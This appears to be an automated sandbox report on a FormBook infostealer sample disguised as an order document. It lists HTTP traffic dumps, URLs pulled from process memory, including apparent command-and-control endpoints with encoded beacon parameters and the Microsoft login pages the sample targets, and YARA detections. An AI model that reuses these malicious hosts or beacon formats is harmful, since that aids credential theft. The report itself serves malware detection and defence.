67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:53:46 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:53:49 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 15:53:51 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1727X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
            Source: compact.exe, 0000000C.00000002.4563338371.0000000005138000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://3cubesinterior.in/n8zi/?Bp=2LpD8tLh&7Dihs8p=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXe
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004AF0000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.00000000039E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://architect-usschool.com/s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD
            Source: compact.exe, 0000000C.00000002.4563338371.000000000463A000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.000000000352A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://epicbazaarhub.com/2769/?7Dihs8p=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4Y
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2115615694.0000000002A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://searchdiscovered.com/__media__/images/logo.gif)
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004E14000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://superunicornpalace.com/mwa4/?Bp=2LpD8tLh&7Dihs8p=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP35
            Source: OFEkXEMCZC.exe, 0000000E.00000002.4564754025.0000000005149000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hondamechanic.today
            Source: OFEkXEMCZC.exe, 0000000E.00000002.4564754025.0000000005149000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hondamechanic.today/pv57/
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mengistiebethlehem.com/Christmas_City_Studio.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe
            Source: compact.exe, 0000000C.00000002.4566009011.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mengistiebethlehem.com/Lehigh_Valley.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2F
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mengistiebethlehem.com/Moravia.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2FFitbFc
            Source: compact.exe, 0000000C.00000002.4566009011.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.mengistiebethlehem.com/display.cfm
            Source: compact.exe, 0000000C.00000002.4563338371.00000000044A8000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003398000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://yg08.gowi0i.xyz
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004C82000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000C.00000002.4566009011.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
            Source: compact.exe, 0000000C.00000002.4556356627.000000000313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: compact.exe, 0000000C.00000002.4556356627.000000000311F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: compact.exe, 0000000C.00000003.2706758927.0000000008283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: compact.exe, 0000000C.00000002.4556356627.000000000313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: compact.exe, 0000000C.00000002.4556356627.000000000313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033I81
            Source: compact.exe, 0000000C.00000002.4556356627.000000000313B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: compact.exe, 0000000C.00000002.4556356627.000000000311F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://support.hostgator.com/
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: firefox.exe, 0000000F.00000002.2818794642.0000000026FA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.fondazionegtech.org/jmiz/?7Dihs8p=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKK
            Source: compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: compact.exe, 0000000C.00000002.4563338371.0000000004C82000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000C.00000002.4566009011.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=easybackpage.net
            Source: OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
